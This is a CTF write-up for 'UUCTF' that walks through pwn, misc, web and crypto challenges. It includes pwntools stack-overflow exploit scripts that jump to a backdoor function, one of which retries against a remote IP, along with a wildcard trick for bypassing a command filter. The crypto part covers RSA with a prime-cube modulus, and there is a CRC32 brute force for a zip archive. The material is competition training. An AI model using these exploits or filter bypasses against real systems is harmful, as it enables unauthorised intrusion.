# UUCTF writeup
Writer: Pr0b1em
(A rookie binary player aiming to become a full-stack player, though I'm not worthy of it.)
## PWN
### babystack
Download the attachment and check the protections first: only NX is enabled, and it is a 64-bit binary.
Open it in IDA and look at `main` and the string list: the key strings `system` and `/bin/sh` are there, and there is a `vuln` function, so follow it.
In `vuln` the buffer `buf` can be overflowed on the stack, and there is also a ready-made `back_door` function to use.
Build the script.
exp:
```python
from pwn import *

#r=remote("",)
r=process('./babystack')
elf=ELF('./babystack')
context(os = "linux", arch = "amd64", log_level= "debug")
backdoor=0x400734                           # address of back_door (no PIE, so it is fixed)
payload=b'a'*(0x100+8)+p64(backdoor)        # fill buf (0x100) + saved rbp (8), then the return address
r.sendlineafter("What's your name?",payload)
r.interactive()
```
### easystack
Fancy stack overflow.
Check the protections: NX and PIE are enabled, so the base address is randomized and we will probably have to rely on luck.
Open it in IDA: the content is almost identical to the previous challenge. The only difference is that the overflow leaves room for exactly one backdoor address. Because the base address is unknown and has to be guessed, the script changes a little.
exp:
```python
from pwn import *

# Keep reconnecting until the guessed address happens to be right.
while True:
    try:
        #p=process('./babystack')
        p=remote("43.143.7.127",28054)
        elf=ELF('./easystack')
        context(os = "linux", arch = "amd64", log_level= "debug")
        backdoor=0x1185                          # offset of back_door inside the PIE image
        payload=b'a'*(0x100+8)+p64(backdoor)
        p.sendlineafter("What's your name?",payload)
        p.interactive()
    except Exception:
        p.close()
        continue
```
### just rce
A simple RCE: the `rev` command prints the file reversed, which gives the flag, combined with wildcards to get past the keyword filter.
## Misc
### Where is flag?
Traffic analysis. Open the capture in Wireshark and export the HTTP objects; one of them is a flag archive. The file inside turns out to be a PNG, but opening it in 010 Editor shows the file header is missing, so repair it. The image is a QR code, and the scanned content contains zero-width characters; decoding them on an online site gives the flag.
### 搬好小板凳听故事 (Pull up a stool and listen to the story)
Solved easily with Ciphey. What a "三花淡奶" (three-flower evaporated milk)!
### 村中奇怪的故事 (A strange story in the village)
The picture really misled me; I didn't expect it to be the Hundred Family Surnames (百家姓) cipher. Once I looked more carefully I got it and went to try it right away, and the hint 七七 posted later confirmed my idea. Honestly, the story is rubbish and left me completely baffled, and after I solved it the flag on the platform backend was still wrong, which made me question my life.
### 蜜蜂和蛆 (Bees and maggots)
CRC32 brute force: pass1 and pass2 each give one part of the password. The archive then opens to a PNG of a bee and a maggot; fixing the width and height reveals a QR code, which decodes to base64. I have deleted the files and can't be bothered to reproduce it.
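As an added example (not code from the write-up), this shows why the CRC32 brute force works: a zip's central directory stores the CRC-32 of the plaintext even for encrypted entries, so a 4-byte file can be recovered by enumerating every candidate. It assumes the entries are lowercase letters and builds a constructed, unencrypted sample archive, since the CRC field is the same either way.

```python
import io
import itertools
import zipfile
import zlib

ALPHABET = "abcdefghijklmnopqrstuvwxyz"   # assumption: entries are lowercase letters


def crc32_of(data):
    """CRC-32 as stored in a zip header (zlib.crc32 gives the same polynomial)."""
    return zlib.crc32(data)


def crc32_candidates(target_crc, length, alphabet=ALPHABET):
    """Every string of `length` chars from `alphabet` whose CRC-32 equals target_crc.
    All matches are returned because CRC-32 is not collision-resistant."""
    hits = []
    for chars in itertools.product(alphabet.encode(), repeat=length):
        data = bytes(chars)
        if zlib.crc32(data) == target_crc:
            hits.append(data.decode())
    return hits


def make_sample_zip(content, name="pass1.txt"):
    """Constructed sample archive with one stored entry (unencrypted here; an
    encrypted entry carries exactly the same CRC field, which is the weakness)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    return buf.getvalue()


def recover_short_entries(zip_bytes, max_len=4, alphabet=ALPHABET):
    """Map each entry name to the plaintexts matching its CRC, or None if it is
    too long to enumerate (the search space grows as len(alphabet) ** size)."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.file_size > max_len:
                results[info.filename] = None
                continue
            results[info.filename] = crc32_candidates(info.CRC, info.file_size, alphabet)
    return results


if __name__ == "__main__":
    print(recover_short_entries(make_sample_zip(b"bees")))
```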
### 王八快跑 (Run, turtle, run)
If it tells you to run, you run. Just sign in! Hahahaha
### 略略略来抓我啊 (Nyah nyah, come and catch me)
I'm still not very good at OSINT and haven't done it in a long time, so it took a while to find. The first picture shows a 钱塘驿 (Qiantang Yi), which gives the location away directly; after that it was a matter of combing the map for the hotel, a test of eyesight and of stamina.
## web
### websign
F12 doesn't work? Then I'll just do it by hand!
## Crypto
### 爱丽丝梦境的兔子 (The rabbit in Alice's dream)
The Rabbit cipher, the Core Socialist Values cipher and the rail fence cipher, simply nested one inside the other.
### disparity_rsa
This RSA is trivial; I solved it directly with RsaCtfTool and didn't even bother writing a script, so no screenshots of a reproduction here ~~(really lazy)~~
### Easy_base64
```python
import base64

# There is a fixed string here, which is the flag.
# 1. From the base64 encoding of the flag we know the first character is 'Z', ASCII 90.
flag = 'flag{}'
tmp = base64.b64encode(bytes(flag, "utf-8"))
print(str(tmp))

# 2. Work the ASCII codes forward from that result.
# a[0] is the first base64 byte and every later a[i] is base64[i-1] ^ base64[i],
# so XORing each recovered byte into the next entry rebuilds the base64 string in place.
a = [90, 55, 21, 16, 50, 105, 71, 14, 27, 41, 30, 34, 16, 50,111,74, 62, 5, 18, 54, 52,106, 85, 31, 54, 24, 111, 83, 11, 38, 1, 53, 17, 37, 17, 35, 47, 32, 52, 40, 2, 9, 59, 47, 54, 25, 111, 77, 16, 48, 26, 33, 9, 55, 108, 0]
for i in range(0, len(a)-1):
    t = a[i] ^ a[i+1]
    a[i+1] = t
    print(t, end=',')
print()
# The loop prints 109,120,104,90,51,... which are the recovered base64 bytes b[1:]:
b = [90, 109,120,104,90,51,116,122,97,72,86,116,100,86,57,115,77,72,90,108,88,50,103,120,78,86,57,106,97,71,70,115,98,71,86,117,90,122,78,102,100,109,86,121,79,86,57,116,100,84,78,111,102,81,61,61,104]

# 3. Decode. The stray 'h' after the '==' padding is ignored by b64decode.
a = b'ZmxhZ3tzaHVtdV9sMHZlX2gxNV9jaGFsbGVuZzNfdmVyOV9tdTNofQ==h'
tmp = base64.b64decode(a)
print(tmp)
```
### unsafe_prime
What this tests is how to solve the case where n is not the product of two distinct primes. It is another application of Euler's theorem: phi(n) is no longer (p-1)*(q-1) but p**3 - p**2, that is p**2 * (p-1), because among the numbers below p**3 only the p**2 multiples of p are not coprime to it.
The challenge source (the two large numbers are the n and c it printed):
```python
from Crypto.Util.number import *
#from flag import flag
import libnum

p=getPrime(1024)
n=p**3            # the modulus is a prime cube, not a product of two primes
e=65537
flag='flag{luoxiheng}'
c=pow(libnum.s2n(flag),e,n)
print(n)
print(c)
#1781066779141074297846071955037887396311182371062305797790413639302252321886055189043670187843106208315282055227397316083218930657040969292641990094428330517286511511741846106485971830443788363541411679523274683568732340113625424593194464460018629545968907529693143364870519531630721083893407011154181539445417439610805148961135948617691115328261432541033785402520757881586489819563221498111411690769065511011083021336493731421274742041131952523427183184133413677315203810963447656037908287875212013900845740870561508870574734100843624059414134156975073835607712519402938132401964708681236647568922173471703538744207491065165405594141287750705055447493380970194312139898574699147098202027540057477562090764694370368571887563631557761911842054442637038169316686266784299889397326811768646649462480349219937292894824766045607723468654723947999531346474969019631500665628522355198334827965770037487344994396753505248472283247731
#1402371150275079475353867962992356093684205278224746766691813462864343871795075217989508355749642716635931824907174189358797217546624305634264458802157933311315419673854405865092102322247505412453586251582022669511221048298234732642016439123525455296325766292112758881774720932499142635136210314142144509741404827421282969081272484330382868174392651681290127032351489627054643864671335712011990584326951285867375878235135547391155357814807654366986019707719726796289990920154227959213228064918435259919697047405788311280560319520593639968900649500117511665741073545430999580686455996145426173603547052710181735901020361145546892741579951501409108067297139928103329203429485237575169217432586580425019729120741661192297552519858305628835738911159460615968385837687234565509200392302553443089729906970894661310333276852803980265040679214814192141779678148895736682538612828771031493541256243879854624644771924477873876038496224
```
The solve script:
```python
import libnum
import gmpy2
import binascii
from Crypto.Util.number import *

n=1781066779141074297846071955037887396311182371062305797790413639302252321886055189043670187843106208315282055227397316083218930657040969292641990094428330517286511511741846106485971830443788363541411679523274683568732340113625424593194464460018629545968907529693143364870519531630721083893407011154181539445417439610805148961135948617691115328261432541033785402520757881586489819563221498111411690769065511011083021336493731421274742041131952523427183184133413677315203810963447656037908287875212013900845740870561508870574734100843624059414134156975073835607712519402938132401964708681236647568922173471703538744207491065165405594141287750705055447493380970194312139898574699147098202027540057477562090764694370368571887563631557761911842054442637038169316686266784299889397326811768646649462480349219937292894824766045607723468654723947999531346474969019631500665628522355198334827965770037487344994396753505248472283247731
e=65537
# n = p**3, so p is the exact integer cube root of n (e.g. gmpy2.iroot(n, 3)[0]).
p = 121216033233585299462279856144422199686140149244819402908675131452249143435823157035320400025743305736047792084067723177554239638229731651194515823556880874798950035236056266154727789682357822323822962110560589110432270068487448525123808163818606838762211746373156874518622834972063360072190758655502892772811
n = p**3
# Euler's totient of a prime cube: phi(p**3) = p**2 * (p-1) = p**3 - p**2
phi_n= p**3-p**2
c=1402371150275079475353867962992356093684205278224746766691813462864343871795075217989508355749642716635931824907174189358797217546624305634264458802157933311315419673854405865092102322247505412453586251582022669511221048298234732642016439123525455296325766292112758881774720932499142635136210314142144509741404827421282969081272484330382868174392651681290127032351489627054643864671335712011990584326951285867375878235135547391155357814807654366986019707719726796289990920154227959213228064918435259919697047405788311280560319520593639968900649500117511665741073545430999580686455996145426173603547052710181735901020361145546892741579951501409108067297139928103329203429485237575169217432586580425019729120741661192297552519858305628835738911159460615968385837687234565509200392302553443089729906970894661310333276852803980265040679214814192141779678148895736682538612828771031493541256243879854624644771924477873876038496224
d=gmpy2.invert(e,phi_n)     # d = e^-1 mod phi(n), exactly as in textbook RSA
print(d)
m=pow(c,d,n)
print(m)
#print(binascii.unhexlify(hex(m)[2:]))
print(libnum.n2s(int(m)))
string = long_to_bytes(m)
print(string)
```
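As an added example (not the write-up's or the challenge's code), this carries the unsafe_prime idea through in general for any modulus n = p**k: p comes from the exact integer k-th root, phi(n) = p**k - p**(k-1), and, unlike square-free n, decryption fails when the message is a multiple of p, which can be detected from the ciphertext alone. It uses only the standard library and constructed toy parameters (p = 10007, e = 65537).

```python
import math


def integer_kth_root(n, k):
    """Largest integer r with r**k <= n, by binary search (exact for big ints)."""
    lo, hi = 0, 1
    while hi ** k <= n:
        hi <<= 1
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo


def phi_prime_power(p, k):
    """Euler's totient of p**k: only the p**(k-1) multiples of p are not coprime to it."""
    return p ** k - p ** (k - 1)


def recover_private_exponent(n, e, k=3):
    """n = p**k: p is the exact integer k-th root of n, then d = e^-1 mod phi(n)."""
    p = integer_kth_root(n, k)
    if p ** k != n:
        raise ValueError("n is not a perfect %d-th power" % k)
    return p, pow(e, -1, phi_prime_power(p, k))   # Python 3.8+ modular inverse


def ciphertext_is_recoverable(n, c):
    """Euler's theorem needs gcd(m, n) == 1. For n = p**k, p | m exactly when p | c,
    so a ciphertext sharing a factor with n cannot be decrypted this way (for
    square-free n the CRT makes RSA work for every m, so this never comes up)."""
    return math.gcd(c, n) == 1


def decrypt(n, e, c, k=3):
    """Decrypt c under a k-th prime power modulus; returns the message bytes."""
    if not ciphertext_is_recoverable(n, c):
        raise ValueError("c shares a factor with n: m is a multiple of p")
    _, d = recover_private_exponent(n, e, k)
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    p, e = 10007, 65537          # constructed toy parameters, not the challenge's
    n = p ** 3
    c = pow(int.from_bytes(b"hi", "big"), e, n)
    print(decrypt(n, e, c))      # b'hi'
```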